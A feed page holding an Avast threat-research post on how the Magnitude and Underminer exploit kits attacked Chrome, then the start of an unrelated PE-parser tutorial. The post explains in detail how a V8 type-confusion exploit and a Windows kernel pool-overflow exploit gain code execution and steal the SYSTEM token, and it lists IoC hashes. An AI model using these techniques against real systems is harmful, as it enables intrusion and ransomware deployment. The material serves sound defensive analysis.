Normal view

There are new articles available, click to refresh the page.
Before yesterdayReverse Engineering

Exploit Kits vs. Google Chrome

12 January 2022 at 16:37

In October 2021, we discovered that the Magnitude exploit kit was testing out a Chromium exploit chain in the wild. This really piqued our interest, because browser exploit kits have in the past few years focused mainly on Internet Explorer vulnerabilities and it was believed that browsers like Google Chrome are just too big of a target for them.

#MagnitudeEK is now stepping up its game by using CVE-2021-21224 and CVE-2021-31956 to exploit Chromium-based browsers. This is an interesting development since most exploit kits are currently targeting exclusively Internet Explorer, with Chromium staying out of their reach.

— Avast Threat Labs (@AvastThreatLabs) October 19, 2021

About a month later, we found that the Underminer exploit kit followed suit and developed an exploit for the same Chromium vulnerability. That meant there were two exploit kits that dared to attack Google Chrome: Magnitude using CVE-2021-21224 and CVE-2021-31956 and Underminer using CVE-2021-21224, CVE-2019-0808, CVE-2020-1020, and CVE-2020-1054.

We’ve been monitoring the exploit kit landscape very closely since our discoveries, watching out for any new developments. We were waiting for other exploit kits to jump on the bandwagon, but none other did, as far as we can tell. What’s more, Magnitude seems to have abandoned the Chromium exploit chain. And while Underminer still continues to use these exploits today, its traditional IE exploit chains are doing much better. According to our telemetry, less than 20% of Underminer’s exploitation attempts are targeting Chromium-based browsers.

This is some very good news because it suggests that the Chromium exploit chains were not as successful as the attackers hoped they would be and that it is not currently very profitable for exploit kit developers to target Chromium users. In this blog post, we would like to offer some thoughts into why that could be the case and why the attackers might have even wanted to develop these exploits in the first place. And since we don’t get to see a new Chromium exploit chain in the wild every day, we will also dissect Magnitude’s exploits and share some detailed technical information about them.

Exploit Kit Theory

To understand why exploit kit developers might have wanted to test Chromium exploits, let’s first look at things from their perspective. Their end goal in developing and maintaining an exploit kit is to make a profit: they just simply want to maximize the difference between money “earned” and money spent. To achieve this goal, most modern exploit kits follow a simple formula. They buy ads targeted to users who are likely to be vulnerable to their exploits (e.g. Internet Explorer users). These ads contain JavaScript code that is automatically executed, even when the victim doesn’t interact with the ad in any way (sometimes referred to as drive-by attacks). This code can then further profile the victim’s browser environment and select a suitable exploit for that environment. If the exploitation succeeds, a malicious payload (e.g. ransomware or a coinminer) is deployed to the victim. In this scenario, the money “earned” could be the ransom or mining rewards. On the other hand, the money spent is the cost of ads, infrastructure (renting servers, registering domain names etc.), and the time the attacker spends on developing and maintaining the exploit kit.

Modus operandi of a typical browser exploit kit

The attackers would like to have many diverse exploits ready at any given time because it would allow them to cast a wide net for potential victims. But it is important to note that individual exploits generally get less effective over time. This is because the number of people susceptible to a known vulnerability will decrease as some people patch and other people upgrade to new devices (which are hopefully not plagued by the same vulnerabilities as their previous devices). This forces the attackers to always look for new vulnerabilities to exploit. If they stick with the same set of exploits for years, their profit would eventually reduce down to almost nothing.

So how do they find the right vulnerabilities to exploit? After all, there are thousands of CVEs reported each year, but only a few of them are good candidates for being included in an exploit kit. Weaponizing an exploit generally takes a lot of time (unless, of course, there is a ready-to-use PoC or the exploit can be stolen from a competitor), so the attackers might first want to carefully take into account multiple characteristics of each vulnerability. If a vulnerability scores well across these characteristics, it looks like a good candidate for inclusion in an exploit kit. Some of the more important characteristics are listed below.

  • Prevalence of the vulnerability
    The more users are affected by the vulnerability, the more attractive it is to the attackers. 
  • Exploit reliability
    Many exploits rely on some assumptions or are based on a race condition, which makes them fail some of the time. The attackers obviously prefer high-reliability exploits.
  • Difficulty of exploit development
    This determines the time that needs to be spent on exploit development (if the attackers are even capable of exploiting the vulnerability). The attackers tend to prefer vulnerabilities with a public PoC exploit, which they can often just integrate into their exploit kit with minimal effort.
  • Targeting precision
    The attackers care about how hard it is to identify (and target ads to) vulnerable victims. If they misidentify victims too often (meaning that they serve exploits to victims who they cannot exploit), they’ll just lose money on the malvertising.
  • Expected vulnerability lifetime
    As was already discussed, each vulnerability gets less effective over time. However, the speed at which the effectiveness drops can vary a lot between vulnerabilities, mostly based on how effective is the patching process of the affected software.
  • Exploit detectability
    The attackers have to deal with numerous security solutions that are in the business of protecting their users against exploits. These solutions can lower the exploit kit’s success rate by a lot, which is why the attackers prefer more stealthy exploits that are harder for the defenders to detect. 
  • Exploit potential
    Some exploits give the attackers System, while others might make them only end up inside a sandbox. Exploits with less potential are also less useful, because they either need to be chained with other LPE exploits, or they place limits on what the final malicious payload is able to do.

Looking at these characteristics, the most plausible explanation for the failure of the Chromium exploit chains is the expected vulnerability lifetime. Google is extremely good at forcing users to install browser patches: Chrome updates are pushed to users when they’re ready and can happen many times in a month (unlike e.g. Internet Explorer updates which are locked into the once-a-month “Patch Tuesday” cycle that is only broken for exceptionally severe vulnerabilities). When CVE-2021-21224 was a zero-day vulnerability, it affected billions of users. Within a few days, almost all of these users received a patch. The only unpatched users were those who manually disabled (or broke) automatic updates, those who somehow managed not to relaunch the browser in a long time, and those running Chromium forks with bad patching habits.

A secondary reason for the failure could be attributed to bad targeting precision. Ad networks often allow the attackers to target ads based on various characteristics of the user’s browser environment, but the specific version of the browser is usually not one of these characteristics. For Internet Explorer vulnerabilities, this does not matter that much: the attackers can just buy ads for Internet Explorer users in general. As long as a certain percentage of Internet Explorer users is vulnerable to their exploits, they will make a profit. However, if they just blindly targeted Google Chrome users, the percentage of vulnerable victims might be so low, that the cost of malvertising would outweigh the money they would get by exploiting the few vulnerable users. Google also plans to reduce the amount of information given in the User-Agent string. Exploit kits often heavily rely on this string for precise information about the browser version. With less information in the User-Agent header, they might have to come up with some custom version fingerprinting, which would most likely be less accurate and costly to manage.

Now that we have some context about exploit kits and Chromium, we can finally speculate about why the attackers decided to develop the Chromium exploit chains. First of all, adding new vulnerabilities to an exploit kit seems a lot like a “trial and error” activity. While the attackers might have some expectations about how well a certain exploit will perform, they cannot know for sure how useful it will be until they actually test it out in the wild. This means it should not be surprising that sometimes, their attempts to integrate an exploit turn out worse than they expected. Perhaps they misjudged the prevalence of the vulnerabilities or thought that it would be easier to target the vulnerable victims. Perhaps they focused too much on the characteristics that the exploits do well on: after all, they have reliable, high-potential exploits for a browser that’s used by billions. It could also be that this was all just some experimentation where the attackers just wanted to explore the land of Chromium exploits.

It’s also important to point out that the usage of Internet Explorer (which is currently vital for the survival of exploit kits) has been steadily dropping over the past few years. This may have forced the attackers to experiment with how viable exploits for other browsers are because they know that sooner or later they will have to make the switch. But judging from these attempts, the attackers do not seem fully capable of making the switch as of now. That is some good news because it could mean that if nothing significant changes, exploit kits might be forced to retire when Internet Explorer usage drops below some critical limit.

CVE-2021-21224

Let’s now take a closer look at the Magnitude’s exploit chain that we discovered in the wild. The exploitation starts with a JavaScript exploit for CVE-2021-21224. This is a type confusion vulnerability in V8, which allows the attacker to execute arbitrary code within a (sandboxed) Chromium renderer process. A zero-day exploit for this vulnerability (or issue 1195777, as it was known back then since no CVE ID had been assigned yet) was dumped on Github on April 14, 2021. The exploit worked for a couple of days against the latest Chrome version, until Google rushed out a patch about a week later.

It should not be surprising that Magnitude’s exploit is heavily inspired by the PoC on Github. However, while both Magnitude’s exploit and the PoC follow a very similar exploitation path, there are no matching code pieces, which suggests that the attackers didn’t resort that much to the “Copy/Paste” technique of exploit development. In fact, Magnitude’s exploit looks like a more cleaned-up and reliable version of the PoC. And since there is no obfuscation employed (the attackers probably meant to add it in later), the exploit is very easy to read and debug. There are even very self-explanatory function names, such as confusion_to_oob, addrof, and arb_write, and variable names, such as oob_array, arb_write_buffer, and oob_array_map_and_properties. The only way this could get any better for us researchers would be if the authors left a couple of helpful comments in there…

Interestingly, some parts of the exploit also seem inspired by a CTF writeup for a “pwn” challenge from *CTF 2019, in which the players were supposed to exploit a made-up vulnerability that was introduced into a fork of V8. While CVE-2021-21224 is obviously a different (and actual rather than made-up) vulnerability, many of the techniques outlined in that writeup apply for V8 exploitation in general and so are used in the later stages of the Magnitude’s exploit, sometimes with the very same variable names as those used in the writeup.

The core of the exploit, triggering the vulnerability to corrupt the length of vuln_array

The root cause of the vulnerability is incorrect integer conversion during the SimplifiedLowering phase. This incorrect conversion is triggered in the exploit by the Math.max call, shown in the code snippet above. As can be seen, the exploit first calls foofunc in a loop 0x10000 times. This is to make V8 compile that function because the bug only manifests itself after JIT compilation. Then, helper["gcfunc"] gets called. The purpose of this function is just to trigger garbage collection. We tested that the exploit also works without this call, but the authors probably put it there to improve the exploit’s reliability. Then, foofunc is called one more time, this time with flagvar=true, which makes xvar=0xFFFFFFFF. Without the bug, lenvar should now evaluate to -0xFFFFFFFF and the next statement should throw a RangeError because it should not be possible to create an array with a negative length. However, because of the bug, lenvar evaluates to an unexpected value of 1. The reason for this is that the vulnerable code incorrectly converts the result of Math.max from an unsigned 32-bit integer 0xFFFFFFFF to a signed 32-bit integer -1. After constructing vuln_array, the exploit calls Array.prototype.shift on it. Under normal circumstances, this method should remove the first element from the array, so the length of vuln_array should be zero. However, because of the disparity between the actual and the predicted value of lenvar, V8 makes an incorrect optimization here and just puts the 32-bit constant 0xFFFFFFFF into Array.length (this is computed as 0-1 with an unsigned 32-bit underflow, where 0 is the predicted length and -1 signifies Array.prototype.shift decrementing Array.length). 

A demonstration of how an overwrite on vuln_array can corrupt the length of oob_array

Now, the attackers have successfully crafted a JSArray with a corrupted Array.length, which allows them to perform out-of-bounds memory reads and writes. The very first out-of-bounds memory write can be seen in the last statement of the confusion_to_oob function. The exploit here writes 0xc00c to vuln_array[0x10]. This abuses the deterministic memory layout in V8 when a function creates two local arrays. Since vuln_array was created first, oob_array is located at a known offset from it in memory and so by making out-of-bounds memory accesses through vuln_array, it is possible to access both the metadata and the actual data of oob_array. In this case, the element at index 0x10 corresponds to offset 0x40, which is where Array.length of oob_array is stored. The out-of-bounds write therefore corrupts the length of oob_array, so it is now too possible to read and write past its end.

The addrof and fakeobj exploit primitives

Next, the exploit constructs the addrof and fakeobj exploit primitives. These are well-known and very powerful primitives in the world of JavaScript engine exploitation. In a nutshell, addrof leaks the address of a JavaScript object, while fakeobj creates a new, fake object at a given address. Having constructed these two primitives, the attacker can usually reuse existing techniques to get to their ultimate goal: arbitrary code execution. 

A step-by-step breakdown of the addrof primitive. Note that just the lower 32 bits of the address get leaked, while %DebugPrint returns the whole 64-bit address. In practice, this doesn’t matter because V8 compresses pointers by keeping upper 32 bits of all heap pointers constant.

Both primitives are constructed in a similar way, abusing the fact that vuln_array[0x7] and oob_array[0] point to the very same memory location. It is important to note here that  vuln_array is internally represented by V8 as HOLEY_ELEMENTS, while oob_array is PACKED_DOUBLE_ELEMENTS (for more information about internal array representation in V8, please refer to this blog post by the V8 devs). This makes it possible to write an object into vuln_array and read it (or more precisely, the pointer to it) from the other end in oob_array as a double. This is exactly how addrof is implemented, as can be seen above. Once the address is read, it is converted using helper["f2ifunc"] from double representation into an integer representation, with the upper 32 bits masked out, because the double takes 64 bits, while pointers in V8 are compressed down to just 32 bits. fakeobj is implemented in the same fashion, just the other way around. First, the pointer is converted into a double using helper["i2ffunc"]. The pointer, encoded as a double, is then written into oob_array[0] and then read from vuln_array[0x7], which tricks V8 into treating it as an actual object. Note that there is no masking needed in fakeobj because the double written into oob_array is represented by more bits than the pointer read from vuln_array.

The arbitrary read/write exploit primitives

With addrof and fakeobj in place, the exploit follows a fairly standard exploitation path, which seems heavily inspired by the aforementioned *CTF 2019 writeup. The next primitives constructed by the exploit are arbitrary read/write. To achieve these primitives, the exploit fakes a JSArray (aptly named fake in the code snippet above) in such a way that it has full control over its metadata. It can then overwrite the fake JSArray’s elements pointer, which points to the address where the actual elements of the array get stored. Corrupting the elements pointer allows the attackers to point the fake array to an arbitrary address, and it is then subsequently possible to read/write to that address through reads/writes on the fake array.

Let’s look at the implementation of the arbitrary read/write primitive in a bit more detail. The exploit first calls the get_arw function to set up the fake JSArray. This function starts by using an overread on oob_array[3] in order to leak map and properties of oob_array (remember that the original length of oob_array was 3 and that its length got corrupted earlier). The map and properties point to structures that basically describe the object type in V8. Then, a new array called point_array gets created, with the oob_array_map_and_properties value as its first element. Finally, the fake JSArray gets constructed at offset 0x20 before point_array. This offset was carefully chosen, so that the the JSArray structure corresponding to fake overlaps with elements of point_array. Therefore, it is possible to control the internal members of fake by modifying the elements of point_array. Note that elements in point_array take 64 bits, while members of the JSArray structure usually only take 32 bits, so modifying one element of point_array might overwrite two members of fake at the same time. Now, it should make sense why the first element of point_array was set to oob_array_map_and_properties. The first element is at the same address where V8 would look for the map and properties of fake. By initializing it like this, fake is created to be a PACKED_DOUBLE_ELEMENTS JSArray, basically inheriting its type from oob_array.

The second element of point_array overlaps with the elements pointer and Array.length of fake. The exploit uses this for both arbitrary read and arbitrary write, first corrupting the elements pointer to point to the desired address and then reading/writing to that address through fake[0]. However, as can be seen in the exploit code above, there are some additional actions taken that are worth explaining. First of all, the exploit always makes sure that addrvar is an odd number. This is because V8 expects pointers to be tagged, with the least significant bit set. Then, there is the addition of 2<<32 to addrvar. As was explained before, the second element of point_array takes up 64 bits in memory, while the elements pointer and Array.length both take up only 32 bits. This means that a write to point_array[1] overwrites both members at once and the 2<<32 just simply sets the Array.length, which is controlled by the most significant 32 bits. Finally, there is the subtraction of 8 from addrvar. This is because the elements pointer does not point straight to the first element, but instead to a FixedDoubleArray structure, which takes up eight bytes and precedes the actual element data in memory.

A dummy WebAssembly program that will get hollowed out and replaced by Magnitude’s shellcode

The final step taken by the exploit is converting the arbitrary read/write primitive into arbitrary code execution. For this, it uses a well-known trick that takes advantage of WebAssembly. When V8 JIT-compiles a WebAssembly function, it places the compiled code into memory pages that are both writable and executable (there now seem to be some new mitigations that aim to prevent this trick, but it is still working against V8 versions vulnerable to CVE-2021-21224). The exploit can therefore locate the code of a JIT-compiled WebAssembly function, overwrite it with its own shellcode and then call the original WebAssembly function from Javascript, which executes the shellcode planted there.

Magnitude’s exploit first creates a dummy WebAssembly module that contains a single function called main, which just returns the number 42 (the original code of this function doesn’t really matter because it will get overwritten with the shellcode anyway). Using a combination of addrof and arb_read, the exploit obtains the address where V8 JIT-compiled the function main. Interestingly, it then constructs a whole new arbitrary write primitive using an ArrayBuffer with a corrupted backing store pointer and uses this newly constructed primitive to write shellcode to the address of main. While it could theoretically use the first arbitrary write primitive to place the shellcode there, it chooses this second method, most likely because it is more reliable. It seems that the first method might crash V8 under some rare circumstances, which makes it not practical for repeated use, such as when it gets called thousands of times to write a large shellcode buffer into memory.

There are two shellcodes embedded in the exploit. The first one contains an exploit for CVE-2021-31956. This one gets executed first and its goal is to steal the SYSTEM token to elevate the privileges of the current process. After the first shellcode returns, the second shellcode gets planted inside the JIT-compiled WebAssembly function and executed. This second shellcode injects Magniber ransomware into some already running process and lets it encrypt the victim’s drives.

CVE-2021-31956

Let’s now turn our attention to the second exploit in the chain, which Magnitude uses to escape the Chromium sandbox. This is an exploit for CVE-2021-31956, a paged pool buffer overflow in the Windows kernel. It was discovered in June 2021 by Boris Larin from Kaspersky, who found it being used as a zero-day in the wild as a part of the PuzzleMaker attack. The Kaspersky blog post about PuzzleMaker briefly describes the vulnerability and the way the attackers chose to exploit it. However, much more information about the vulnerability can be found in a twopart blog series by Alex Plaskett from NCC Group. This blog series goes into great detail and pretty much provides a step-by-step guide on how to exploit the vulnerability. We found that the attackers behind Magnitude followed this guide very closely, even though there are certainly many other approaches that they could have chosen for exploitation. This shows yet again that publishing vulnerability research can be a double-edged sword. While the blog series certainly helped many defend against the vulnerability, it also made it much easier for the attackers to weaponize it.

The vulnerability lies in ntfs.sys, inside the function NtfsQueryEaUserEaList, which is directly reachable from the syscall NtQueryEaFile. This syscall internally allocates a temporary buffer on the paged pool (the size of which is controllable by a syscall parameter) and places there the NTFS Extended Attributes associated with a given file. Individual Extended Attributes are separated by a padding of up to four bytes. By making the padding start directly at the end of the allocated pool chunk, it is possible to trigger an integer underflow which results in NtfsQueryEaUserEaList writing subsequent Extended Attributes past the end of the pool chunk. The idea behind the exploit is to spray the pool so that chunks containing certain Windows Notification Facility (WNF) structures can be corrupted by the overflow. Using some WNF magic that will be explained later, the exploit gains an arbitrary read/write primitive, which it uses to steal the SYSTEM token.

The exploit starts by checking the victim’s Windows build number. Only builds 18362, 18363, 19041, and 19042 (19H1 – 20H2) are supported, and the exploit bails out if it finds itself running on a different build. The build number is then used to determine proper offsets into the _EPROCESS structure as well as to determine correct syscall numbers, because syscalls are invoked directly by the exploit, bypassing the usual syscall stubs in ntdll.

Check for the victim’s Windows build number

Next, the exploit brute-forces file handles, until it finds one on which it can use the NtSetEAFile syscall to set its NTFS Extended Attributes. Two attributes are set on this file, crafted to trigger an overflow of 0x10 bytes into the next pool chunk later when NtQueryEaFile gets called.

Specially crafted NTFS Extended Attributes, designed to cause a paged pool buffer overflow

When the specially crafted NTFS Extended Attributes are set, the exploit proceeds to spray the paged pool with _WNF_NAME_INSTANCE and _WNF_STATE_DATA structures. These structures are sprayed using the syscalls NtCreateWnfStateName and NtUpdateWnfStateData, respectively. The exploit then creates 10 000 extra _WNF_STATE_DATA structures in a row and frees each other one using NtDeleteWnfStateData. This creates holes between _WNF_STATE_DATA chunks, which are likely to get reclaimed on future pool allocations of similar size. 

With this in mind, the exploit now triggers the vulnerability using NtQueryEaFile, with a high likelihood of getting a pool chunk preceding a random _WNF_STATE_DATA chunk and thus overflowing into that chunk. If that really happens, the _WNF_STATE_DATA structure will get corrupted as shown below. However, the exploit doesn’t know which _WNF_STATE_DATA structure got corrupted, if any. To find the corrupted structure, it has to iterate over all of them and query its ChangeStamp using NtQueryWnfStateData. If the ChangeStamp contains the magic number 0xcafe, the exploit found the corrupted chunk. In case the overflow does not hit any _WNF_STATE_DATA chunk, the exploit just simply tries triggering the vulnerability again, up to 32 times. Note that in case the overflow didn’t hit a _WNF_STATE_DATA chunk, it might have corrupted a random chunk in the paged pool, which could result in a BSoD. However, during our testing of the exploit, we didn’t get any BSoDs during normal exploitation, which suggests that the pool spraying technique used by the attackers is relatively robust.

The corrupted _WNF_STATE_DATA instance. AllocatedSize and DataSize were both artificially increased, while ChangeStamp got set to an easily recognizable value.

After a successful _WNF_STATE_DATA corruption, more _WNF_NAME_INSTANCE structures get sprayed on the pool, with the idea that they will reclaim the other chunks freed by NtDeleteWnfStateData. By doing this, the attackers are trying to position a _WNF_NAME_INSTANCE chunk after the corrupted _WNF_STATE_DATA chunk in memory. To explain why they would want this, let’s first discuss what they achieved by corrupting the _WNF_STATE_DATA chunk.

The _WNF_STATE_DATA structure can be thought of as a header preceding an actual WnfStateData buffer in memory. The WnfStateData buffer can be read using the syscall NtQueryWnfStateData and written to using NtUpdateWnfStateData. _WNF_STATE_DATA.AllocatedSize determines how many bytes can be written to WnfStateData and _WNF_STATE_DATA.DataSize determines how many bytes can be read. By corrupting these two fields and setting them to a high value, the exploit gains a relative memory read/write primitive, obtaining the ability to read/write memory even after the original WnfStateData buffer. Now it should be clear why the attackers would want a _WNF_NAME_INSTANCE chunk after a corrupted _WNF_STATE_DATA chunk: they can use the overread/overwrite to have full control over a _WNF_NAME_INSTANCE structure. They just need to perform an overread and scan the overread memory for bytes 03 09 A8, which denote the start of their _WNF_NAME_INSTANCE structure. If they want to change something in this structure, they can just modify some of the overread bytes and overwrite them back using NtUpdateWnfStateData.

The exploit scans the overread memory, looking for a _WNF_NAME_INSTANCE header. 0x0903 here represents the NodeTypeCode, while 0xA8 is a preselected NodeByteSize.

What is so interesting about a _WNF_NAME_INSTANCE structure, that the attackers want to have full control over it? Well, first of all, at offset 0x98 there is _WNF_NAME_INSTANCE.CreatorProcess, which gives them a pointer to _EPROCESS relevant to the current process. Kaspersky reported that PuzzleMaker used a separate information disclosure vulnerability, CVE-2021-31955, to leak the _EPROCESS base address. However, the attackers behind Magnitude do not need to use a second vulnerability, because the _EPROCESS address is just there for the taking.

Another important offset is 0x58, which corresponds to _WNF_NAME_INSTANCE.StateData. As the name suggests, this is a pointer to a _WNF_STATE_DATA structure. By modifying this, the attackers can not only enlarge the WnfStateData buffer but also redirect it to an arbitrary address, which gives them an arbitrary read/write primitive. There are some constraints though, such as that the StateData pointer has to point 0x10 bytes before the address that is to be read/written and that there has to be some data there that makes sense when interpreted as a _WNF_STATE_DATA structure.

The StateData pointer gets first set to _EPROCESS+0x28, which allows the exploit to read _KPROCESS.ThreadListHead (interestingly, this value gets leaked using ChangeStamp and DataSize, not through WnfStateData). The ThreadListHead points to _KTHREAD.ThreadListEntry of the first thread, which is the current thread in the context of Chromium exploitation. By subtracting the offset of ThreadListEntry, the exploit gets the _KTHREAD base address for the current thread. 

With the base address of _KTHREAD, the exploit points StateData to _KTHREAD+0x220, which allows it to read/write up to three bytes starting from _KTHREAD+0x230. It uses this to set the byte at _KTHREAD+0x232 to zero. On the targeted Windows builds, the offset 0x232 corresponds to _KTHREAD.PreviousMode. Setting its value to SystemMode=0 tricks the kernel into believing that some of the thread’s syscalls are actually originating from the kernel. Specifically, this allows the thread to use the NtReadVirtualMemory and NtWriteVirtualMemory syscalls to perform reads and writes to the kernel address space.

The exploit corrupting _KTHREAD.PreviousMode

As was the case in the Chromium exploit, the attackers here just traded an arbitrary read/write primitive for yet another arbitrary read/write primitive. However, note that the new primitive based on PreviousMode is a significant upgrade compared to the original StateData one. Most importantly, the new primitive is free of the constraints associated with the original one. The new primitive is also more reliable because there are no longer race conditions that could potentially cause a BSoD. Not to mention that just simply calling NtWriteVirtualMemory is much faster and much less awkward than abusing multiple WNF-related syscalls to achieve the same result.

With a robust arbitrary read/write primitive in place, the exploit can finally do its thing and proceed to steal the SYSTEM token. Using the leaked _EPROCESS address from before, it finds _EPROCESS.ActiveProcessLinks, which leads to a linked list of other _EPROCESS structures. It iterates over this list until it finds the System process. Then it reads System’s _EPROCESS.Token and assigns this value (with some of the RefCnt bits masked out) to its own _EPROCESS structure. Finally, the exploit also turns off some mitigation flags in _EPROCESS.MitigationFlags.

Now, the exploit has successfully elevated privileges and can pass control to the other shellcode, which was designed to load Magniber ransomware. But before it does that, the exploit performs many cleanup actions that are necessary to avoid blue screening later on. It iterates over WNF-related structures using TemporaryNamesList from _EPROCESS.WnfContext and fixes all the _WNF_NAME_INSTANCE structures that got overflown into at the beginning of the exploit. It also attempts to fix the _POOL_HEADER of the overflown _WNF_STATE_DATA chunks. Finally, the exploit gets rid of both read/write primitives by setting _KTHREAD.PreviousMode back to UserMode=1 and using one last NtUpdateWnfStateData syscall to restore the corrupted StateData pointer back to its original value.

Fixups performed on previously corrupted _WNF_NAME_INSTANCE structures

Final Thoughts

If this isn’t the first time you’re hearing about Magnitude, you might have noticed that it often exploits vulnerabilities that were previously weaponized by APT groups, who used them as zero-days in the wild. To name a few recent examples, CVE-2021-31956 was exploited by PuzzleMaker, CVE-2021-26411 was used in a high-profile attack targeting security researchers, CVE-2020-0986 was abused in Operation Powerfall, and CVE-2019-1367 was reported to be exploited in the wild by an undisclosed threat actor (who might be DarkHotel APT according to Qihoo 360). The fact that the attackers behind Magnitude are so successful in reproducing complex exploits with no public PoCs could lead to some suspicion that they have somehow obtained under-the-counter access to private zero-day exploit samples. After all, we don’t know much about the attackers, but we do know that they are skilled exploit developers, and perhaps Magnitude is not their only source of income. But before we jump to any conclusions, we should mention that there are other, more plausible explanations for why they should prioritize vulnerabilities that were once exploited as zero-days. First, APT groups usually know what they are doing[citation needed]. If an APT group decides that a vulnerability is worth exploiting in the wild, that generally means that the vulnerability is reliably weaponizable. In a way, the attackers behind Magnitude could abuse this to let the APT groups do the hard work of selecting high-quality vulnerabilities for them. Second, zero-days in the wild usually attract a lot of research attention, which means that there are often detailed writeups that analyze the vulnerability’s root cause and speculate about how it could get exploited. These writeups make exploit development a lot easier compared to more obscure vulnerabilities which attracted only a limited amount of research.

As we’ve shown in this blog post, both Magnitude and Underminer managed to successfully develop exploit chains for Chromium on Windows. However, none of the exploit chains were particularly successful in terms of the number of exploited victims. So what does this mean for the future of exploit kits? We believe that unless some new, hard-to-patch vulnerability comes up, exploit kits are not something that the average Google Chrome user should have to worry about much. After all, it has to be acknowledged that Google does a great job at patching and reducing the browser’s attack surface. Unfortunately, the same cannot be said for all other Chromium-based browsers. We found that a big portion of those that we protected from Underminer were running Chromium forks that were months (or even years) behind on patching. Because of this, we recommend avoiding Chromium forks that are slow in applying security patches from the upstream. Also note that some Chromium forks might have vulnerabilities in their own custom codebase. But as long as the number of users running the vulnerable forks is relatively low, exploit kit developers will probably not even bother with implementing exploits specific just for them.

Finally, we should also mention that it is not entirely impossible for exploit kits to attack using zero-day or n-day exploits. If that were to happen, the attackers would probably carry out a massive burst of malvertising or watering hole campaigns. In such a scenario, even regular Google Chrome users would be at risk. The damage done by such an attack could be enormous, depending on the reaction time of browser developers, ad networks, security companies, LEAs, and other concerned parties. There are basically three ways that the attackers could get their hands on a zero-day exploit: they could either buy it, discover it themselves, or discover it being used by some other threat actor. Fortunately, using some simple math we can see that the campaign would have to be very successful if the attackers wanted to recover the cost of the zero-day, which is likely to discourage most of them. Regarding n-day exploitation, it all boils down to a race if the attackers can develop a working exploit sooner than a patch gets written and rolled out to the end users. It’s a hard race to win for the attackers, but it has been won before. We know of at least two cases when an n-day exploit working against the latest Google Chrome version was dumped on GitHub (this probably doesn’t need to be written down, but dumping such exploits on GitHub is not a very bright idea). Fortunately, these were just renderer exploits and there were no accompanying sandbox escape exploits (which would be needed for full weaponization). But if it is possible to win the race for one exploit, it’s not unthinkable that an attacker could win it for two exploits at the same time.

Indicators of Compromise (IoCs)

Magnitude
SHA-256 Note
71179e5677cbdfd8ab85507f90d403afb747fba0e2188b15bd70aac3144ae61a CVE-2021-21224 exploit
a7135b92fc8072d0ad9a4d36e81a6b6b78f1528558ef0b19cb51502b50cffe6d CVE-2021-21224 exploit
6c7ae2c24eaeed1cac0a35101498d87c914c262f2e0c2cd9350237929d3e1191 CVE-2021-31956 exploit
8c52d4a8f76e1604911cff7f6618ffaba330324490156a464a8ceaf9b590b40a payload injector
8ff658257649703ee3226c1748bbe9a2d5ab19f9ea640c52fc7d801744299676 payload injector
Underminer
SHA-256 Note
2ac255e1e7a93e6709de3bbefbc4e7955af44dbc6f977b60618237282b1fb970 CVE-2021-21224 exploit
9552e0819f24deeea876ba3e7d5eff2d215ce0d3e1f043095a6b1db70327a3d2 HiddenBee loader
7a3ba9b9905f3e59e99b107e329980ea1c562a5522f5c8f362340473ebf2ac6d HiddenBee module container
2595f4607fad7be0a36cb328345a18f344be0c89ab2f98d1828d4154d68365f8 amd64/coredll.bin
ed7e6318efa905f71614987942a94df56fd0e17c63d035738daf97895e8182ab amd64/pcs.bin
c2c51aa8317286c79c4d012952015c382420e4d9049914c367d6e72d81185494 CVE-2019-0808 exploit
d88371c41fc25c723b4706719090f5c8b93aad30f762f62f2afcd09dd3089169 CVE-2020-1020 exploit
b201fd9a3622aff0b0d64e829c9d838b5f150a9b20a600e087602b5cdb11e7d3 CVE-2020-1054 exploit

The post Exploit Kits vs. Google Chrome appeared first on Avast Threat Labs.

A dive into the PE file format - LAB 1: Writing a PE Parser

By: 0xRick
29 October 2021 at 01:00

A dive into the PE file format - LAB 1: Writing a PE Parser

Introduction

In the previous posts we’ve discussed the basic structure of PE files, In this post we’re going to apply this knowledge into building a PE file parser in c++ as a proof of concept.

The parser we’re going to build will not be a full parser and is not intended to be used as a reliable tool, this is only an exercise to better understand the PE file structure.
We’re going to focus on PE32 and PE32+ files, and we’ll only parse the following parts of the file:

  • DOS Header
  • Rich Header
  • NT Headers
  • Data Directories (within the Optional Header)
  • Section Headers
  • Import Table
  • Base Relocations Table

The code of this project can be found on my github profile.


Initial Setup

Process Outline

We want out parser to follow the following process:

  1. Read a file.
  2. Validate that it’s a PE file.
  3. Determine whether it’s a PE32 or a PE32+.
  4. Parse out the following structures:
    • DOS Header
    • Rich Header
    • NT Headers
    • Section Headers
    • Import Data Directory
    • Base Relocation Data Directory
  5. Print out the following information:
    • File name and type.
    • DOS Header:
      • Magic value.
      • Address of new exe header.
    • Each entry of the Rich Header, decrypted and decoded.
    • NT Headers - PE file signature.
    • NT Headers - File Header:
      • Machine value.
      • Number of sections.
      • Size of Optional Header.
    • NT Headers - Optional Header:
      • Magic value.
      • Size of code section.
      • Size of initialized data.
      • Size of uninitialized data.
      • Address of entry point.
      • RVA of start of code section.
      • Desired Image Base.
      • Section alignment.
      • File alignment.
      • Size of image.
      • Size of headers.
    • For each Data Directory: its name, RVA and size.
    • For each Section Header:
      • Section name.
      • Section virtual address and size.
      • Section raw data pointer and size.
      • Section characteristics value.
    • Import Table:
      • For each DLL:
        • DLL name.
        • ILT and IAT RVAs.
        • Whether its a bound import or not.
        • for every imported function:
          • Ordinal if ordinal/name flag is 1.
          • Name, hint and Hint/Name table RVA if ordinal/name flag is 0.
    • Base Relocation Table:
      • For each block:
        • Page RVA.
        • Block size.
        • Number of entries.
        • For each entry:
          • Raw value.
          • Relocation offset.
          • Relocation Type.

winnt.h Definitions

We will need the following definitions from the winnt.h header:

  • Types:
    • BYTE
    • WORD
    • DWORD
    • QWORD
    • LONG
    • LONGLONG
    • ULONGLONG
  • Constants:
    • IMAGE_NT_OPTIONAL_HDR32_MAGIC
    • IMAGE_NT_OPTIONAL_HDR64_MAGIC
    • IMAGE_NUMBEROF_DIRECTORY_ENTRIES
    • IMAGE_DOS_SIGNATURE
    • IMAGE_DIRECTORY_ENTRY_EXPORT
    • IMAGE_DIRECTORY_ENTRY_IMPORT
    • IMAGE_DIRECTORY_ENTRY_RESOURCE
    • IMAGE_DIRECTORY_ENTRY_EXCEPTION
    • IMAGE_DIRECTORY_ENTRY_SECURITY
    • IMAGE_DIRECTORY_ENTRY_BASERELOC
    • IMAGE_DIRECTORY_ENTRY_DEBUG
    • IMAGE_DIRECTORY_ENTRY_ARCHITECTURE
    • IMAGE_DIRECTORY_ENTRY_GLOBALPTR
    • IMAGE_DIRECTORY_ENTRY_TLS
    • IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
